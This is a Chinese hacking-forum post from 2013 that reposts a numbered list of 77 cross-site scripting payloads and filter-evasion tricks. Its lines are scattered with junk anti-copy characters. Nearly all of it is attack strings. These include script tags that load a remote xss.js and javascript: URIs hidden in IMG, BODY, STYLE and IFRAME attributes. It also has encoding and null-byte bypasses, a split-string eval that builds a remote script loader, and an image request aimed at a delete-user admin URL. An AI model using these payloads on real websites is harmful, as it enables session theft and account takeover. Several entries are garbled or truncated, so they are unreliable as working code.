找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2789|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
( d* F/ W* D9 z# |, p(1)普通的XSS JavaScript注入( {7 G1 F- }+ b5 D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' U1 a2 W. j8 Q/ ^(2)IMG标签XSS使用JavaScript命令: H: U1 Z# K4 e4 m) d& w9 O' h# R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 c( ]: r$ u' ]
(3)IMG标签无分号无引号
. ]" D6 z- L% ?& f& R<IMG SRC=javascript:alert(‘XSS’)>+ i, |/ U7 j6 I, \3 N$ L
(4)IMG标签大小写不敏感
8 V4 ^, l' t% ~7 N. P<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 U9 |6 g) _. C" L" C7 }' e9 m(5)HTML编码(必须有分号)& [, Y, P5 p# }1 V
<IMG SRC=javascript:alert(“XSS”)>
/ m- _5 {" Y$ }# y, K(6)修正缺陷IMG标签
* ^: w! {3 M& I; t& Z# X<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
5 f! ^; @$ ^2 \  D; g0 s/ h. Z! A% b

! u& v' |0 i9 {$ x6 C, G3 _(7)formCharCode标签(计算器)& v6 b. w+ P. Y; F. x# V. `1 k2 D
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- Y4 G* n8 S$ p( e) Y2 v4 w7 B  T  x(8)UTF-8的Unicode编码(计算器)( `/ a& \( \5 t$ j8 q2 T
<IMG SRC=jav..省略..S')>1 b$ |4 n; \0 x2 A
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
. L, t& b3 J1 K* y<IMG SRC=jav..省略..S')>
- W% Q& a% k' z: u) S& M+ T(10)十六进制编码也是没有分号(计算器)
! q$ J* z$ y, ^+ Y: T$ Z" p<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
- p6 u. C* l& H  S(11)嵌入式标签,将Javascript分开
5 z# X4 l, d6 s0 l1 V' i<IMG SRC=”jav ascript:alert(‘XSS’);”>
, A: l' ^+ B+ o9 \( N# L/ \: S(12)嵌入式编码标签,将Javascript分开
! A4 K; O& ]0 h4 A  D<IMG SRC=”jav ascript:alert(‘XSS’);”>
# Z; n5 w. P) m(13)嵌入式换行符
+ r/ L5 ^0 i$ `% v<IMG SRC=”jav ascript:alert(‘XSS’);”>
. B. y: ]1 a6 t6 d6 G- f) R0 S(14)嵌入式回车; v7 q% e' ]" }
<IMG SRC=”jav ascript:alert(‘XSS’);”>. ?# [- |7 c0 G7 g
(15)嵌入式多行注入JavaScript,这是XSS极端的例子6 k( [% j+ D6 V& v& y
<IMG SRC=”javascript:alert(‘XSS‘)”>
1 U5 W; F0 r' V4 B(16)解决限制字符(要求同页面)
) Z. L: _& {2 M+ L! L0 l<script>z=’document.’</script>
8 v6 f. K* M: v<script>z=z+’write(“‘</script>/ n& j1 g# F5 v) H* y) N) Q4 K
<script>z=z+’<script’</script>
) D+ y0 f2 {: b& I0 f+ L<script>z=z+’ src=ht’</script>
$ Q8 ~  T' i. M" l2 ], n<script>z=z+’tp://ww’</script>
  E* K8 ]8 e$ g* b1 J+ A<script>z=z+’w.shell’</script>3 @' o  Z  b; |6 G+ ?
<script>z=z+’.net/1.’</script>3 M( R  @: T7 h+ @
<script>z=z+’js></sc’</script>! o9 t5 S9 ^  J0 Q& Y  _
<script>z=z+’ript>”)’</script>
8 \9 c+ e+ g1 d5 P/ u<script>eval_r(z)</script>
3 J/ V7 Q" k' |* v$ f$ I- V& ~(17)空字符12-7-1 T00LS - Powered by Discuz! Board. `; }7 g, Q- c" z" k
https://www.t00ls.net/viewthread ... table&tid=15267 2/6. J# q* A: @5 Q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# \/ `% v3 a8 l% v) K7 H6 X(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用! ~& H& l& O4 o1 S9 `4 w7 |% z+ d/ m
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out( S: c9 X3 ?7 R) t. @
(19)Spaces和meta前的IMG标签6 L7 ~3 E6 x1 P3 u; ?0 \
<IMG SRC=” javascript:alert(‘XSS’);”>/ [/ ]& ]7 k' L; T0 N& r/ Z9 g
(20)Non-alpha-non-digit XSS
. Q, P  U; y, x/ D% Y$ V<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 \: u- s7 S* X$ ]$ S, y# \- f
(21)Non-alpha-non-digit XSS to 2* ]  J' O+ o( l. J- q
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 N& ]3 E8 B6 F- S0 l(22)Non-alpha-non-digit XSS to 31 ?: e$ ~, J+ f9 F' p8 O
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 r1 K* B3 B! p; l5 y/ C0 W0 o8 k(23)双开括号! f7 n( @0 z9 V8 }& _- x
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 w+ V* Y% ^6 f. r9 w(24)无结束脚本标记(仅火狐等浏览器)
4 X2 P- n2 ~! N<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>. P! B  V6 c+ K" A7 z( q
(25)无结束脚本标记2
- T. _$ W0 l8 A+ |/ u0 I" z<SCRIPT SRC=//3w.org/XSS/xss.js>4 ^4 v  t3 y4 O& `; K+ S4 R
(26)半开的HTML/JavaScript XSS$ A, N; Z" R! z) u
<IMG SRC=”javascript:alert(‘XSS’)”
( q  v, h# q" {# M8 O$ b(27)双开角括号
; l5 x& C/ }: R! v7 h3 F& e$ K<iframe src=http://3w.org/XSS.html <
" v" {" _' `* B, c. Q8 y(28)无单引号 双引号 分号+ V, P4 C3 P7 j
<SCRIPT>a=/XSS/
1 k) i6 G9 @% Q2 ~alert(a.source)</SCRIPT>4 L  c+ z. U$ L  c# L
(29)换码过滤的JavaScript
% B/ A. H4 P& Y. a8 V2 h\”;alert(‘XSS’);//
1 i  ?  J3 z. G& y(30)结束Title标签
5 c+ r! n! v0 `% X. f  `</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* v$ \: S. x) H5 J$ T4 B  B
(31)Input Image
, I9 Z# J  n, @; q) F+ f: f<INPUT SRC=”javascript:alert(‘XSS’);”>
) O# K2 C/ {  w9 O3 a" `(32)BODY Image7 c" b& F- ^8 H0 A; J( M. e" f/ C/ f
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ R% }4 @# A* c' U(33)BODY标签
9 C7 Z. ~4 c- y1 ]2 Z6 K) K& ^1 Y<BODY(‘XSS’)>  w3 H7 G9 H% @& G- ?! f/ y
(34)IMG Dynsrc% f8 d4 N- z' Q1 q4 W( U/ C& y9 [$ C
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
' g$ O8 Q  K) o6 ^6 Z, o% f(35)IMG Lowsrc
- ?  v5 x/ @' R; S<IMG LOWSRC=”javascript:alert(‘XSS’)”>
, Z5 p! x- y' X, C/ T+ }/ @(36)BGSOUND, a; M  o. T( Z1 ^& I
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
! A$ ^: T# i( z. B" D3 m( w3 V; R(37)STYLE sheet* |+ Y' w5 E0 V! M5 j% H
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 \- H0 t4 O) N; W(38)远程样式表5 f2 j$ k0 p6 r" ^! Z! G  V
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
3 |+ Y. `, \: |(39)List-style-image(列表式)
6 M% E3 N0 j- R% E  L<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
0 V: y/ N" s9 l4 o5 F* Y(40)IMG VBscript
# {' C3 W$ i: k, }  _# X2 {$ ~/ h<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS8 W8 l" V5 B9 @& y& N5 x% e2 d; t  i4 d
(41)META链接url: k! C  w  V( ]( k+ v) r+ F
! r: ]' p: B6 m0 G' x: x& Z0 ^

9 S: p# ?5 I0 {2 z6 J" j<META HTTP-EQUIV=”refresh” CONTENT=”0;
5 n0 D; P7 [8 Q6 X$ |URL=http://;URL=javascript:alert(‘XSS’);”>. q2 y; R/ i  {" c5 G
(42)Iframe  f) L: I' h4 U' Y+ n: c1 T
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>4 A* Y# Q! F! B0 G% W
(43)Frame6 X- Y6 `1 }$ A+ w% ^
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
$ a% ?: [( h, r$ s( N2 ?; |# yhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6, y- P0 v: e2 V$ ?* n
(44)Table
# @! R& T4 b: I6 Q4 [! t/ T& h7 V% P<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>: A; v4 p! X: r/ ~" W' t( ~4 b9 [4 o
(45)TD
! U- y- b: G# o/ u' G) t- J) {<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 h5 t- Q9 p8 o8 \4 l' P% X" z9 h1 @(46)DIV background-image
; y% N8 c. e) O<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" D2 p9 }/ n1 i( A9 E$ w
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-9 v% ^2 p4 [* m/ U  h
8&13&12288&65279)
9 a, x' y5 L6 z; v; R0 L<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 R8 m' t$ g1 v4 P5 V" r) {: w" H(48)DIV expression
8 T% f% u0 ~1 R6 H# R! B/ H4 o<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
: h  L7 X* A% Q5 I7 o(49)STYLE属性分拆表达
7 _& g0 \# D, }8 P% n" @<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
9 J2 N5 @- U  `+ t4 C(50)匿名STYLE(组成:开角号和一个字母开头)
5 G, n. ~  s0 O, T<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" G* I/ r- ?, M% P7 V(51)STYLE background-image
  {, L2 f3 N7 y, N: Z<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
! |2 ?( C# u0 A" s, d: ?CLASS=XSS></A>
  r2 o  V$ ~. s% k(52)IMG STYLE方式
6 F  r2 V9 k7 k" H. a4 Y4 Eexppression(alert(“XSS”))’>
- D& z& `' f1 e9 J(53)STYLE background
; A& T: t0 v$ t+ X4 J<STYLE><STYLE# y' u2 I3 g  u8 M3 R
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>$ ?' ?1 Y6 d0 t/ l0 q- Y) j, [3 P
(54)BASE- _% P4 _5 ?" u3 _
<BASE HREF=”javascript:alert(‘XSS’);//”>3 f! k; ]3 n2 }! Q0 U% V8 M7 ~) g
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS' p# K) R/ T9 c/ \8 C
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>4 k$ {+ d* Z8 ^7 B
(56)在flash中使用ActionScrpt可以混进你XSS的代码: A) w1 w. F4 H: t1 G1 n
a=”get”;
6 a7 K& E  r7 p3 `. Tb=”URL(\”";
" \) [7 h9 }6 sc=”javascript:”;
5 S" N9 ?% x" a" v( a4 Xd=”alert(‘XSS’);\”)”;4 F, c3 S1 J, y! i+ d- O
eval_r(a+b+c+d);& Z" S- @( E! T- j! N- Q
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 l6 Z: g/ F+ e0 N<HTML xmlns:xss># C( u& Z5 x; q0 |
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
5 d1 w" B/ d) k2 P<xss:xss>XSS</xss:xss>% m5 q& A5 u" M$ z
</HTML>, ?% r: r/ x, }8 v7 ?
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
6 s6 k9 Z3 ]9 c0 v, T) y- z<SCRIPT SRC=””></SCRIPT>
: w' V+ ~$ {* |8 \% m(59)IMG嵌入式命令,可执行任意命令( b7 s1 ?0 Y0 D8 e$ |+ `( Q; y: x1 }
<IMG SRC=”http://www.XXX.com/a.php?a=b”>0 S  E1 {9 G! z: _( ^
(60)IMG嵌入式命令(a.jpg在同服务器)- u' P7 o: g7 o' k/ E
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
% J4 v" H/ _3 v* S5 ]2 C7 a(61)绕符号过滤, X3 ^+ a0 M' [. C) [
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) \5 f, n# l, w(62)
$ M" f# b: f+ O8 Y<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
& Z& ]( U0 B% N  t) C(63). l& N2 O2 Q; G  w: S# E+ z
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& E; h/ \& p2 k! B(64)
5 @5 d3 j8 S' G4 S9 p7 R<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>) Z# g' v) L! q9 b, j
(65)
' S# }4 W  W/ U5 `<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
- ?5 t- y+ M% J7 S' B. e# m(66)12-7-1 T00LS - Powered by Discuz! Board, G  X& X/ l! |# }
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
) \+ N% t' t+ Z* Q/ L<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( ?% u. B0 u6 @1 a
(67), F- q! ]4 G6 D2 j$ ]- F/ q; m
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
2 o# a9 L# A! E, _/ X' D</SCRIPT>
/ k/ C# H1 i& ]4 R1 e(68)URL绕行
) v5 @4 i' g0 F* {<A HREF=”http://127.0.0.1/”>XSS</A>
' T0 C, {  X+ W0 ~(69)URL编码# ^9 K+ Y; W, K9 {5 }( Y
<A HREF=”http://3w.org”>XSS</A>
& o7 O, a. U9 ~(70)IP十进制/ X) L4 H* l- _+ a7 \. c
<A HREF=”http://3232235521″>XSS</A>- u! ~3 G! y8 s/ T
(71)IP十六进制* {4 `1 N9 x8 O% w7 {  [+ p- f% b
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>8 l5 ^, _( |/ n
(72)IP八进制& a0 |& v. E. O; @: o- s8 y9 ]% E
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
# ^" @5 `2 h! M$ s# c. U9 ~(73)混合编码8 D. U3 d' s  o! v( P- H
<A HREF=”h2 s3 A: u; j  `
tt p://6 6.000146.0×7.147/”">XSS</A>! b0 B2 P6 o7 i1 V8 m* }
(74)节省[http:]
4 d: z0 I% j! H1 f<A HREF=”//www.google.com/”>XSS</A>
  e0 R7 T% c9 e6 M; h7 O7 w, n, x(75)节省[www]# }# b4 N) ~  o* I9 T
<A HREF=”http://google.com/”>XSS</A>7 g: s& C  k. m: a' H9 b4 c3 f+ Q2 _+ {! ?
(76)绝对点绝对DNS
% A! O. {" C6 q( K5 V<A HREF=”http://www.google.com./”>XSS</A>  E9 K, Q5 b" S/ {  V0 X1 T
(77)javascript链接, v3 Q7 R1 t$ w. @# @2 [
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>! @: _- q% j7 M
. Z, H3 S# H+ ^6 V- s1 [( r
原文地址:http://fuzzexp.org/u/0day/?p=14
& b* G7 \0 o3 ]- Y6 o1 K; y7 `% k- |& V& J8 |- q( L3 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表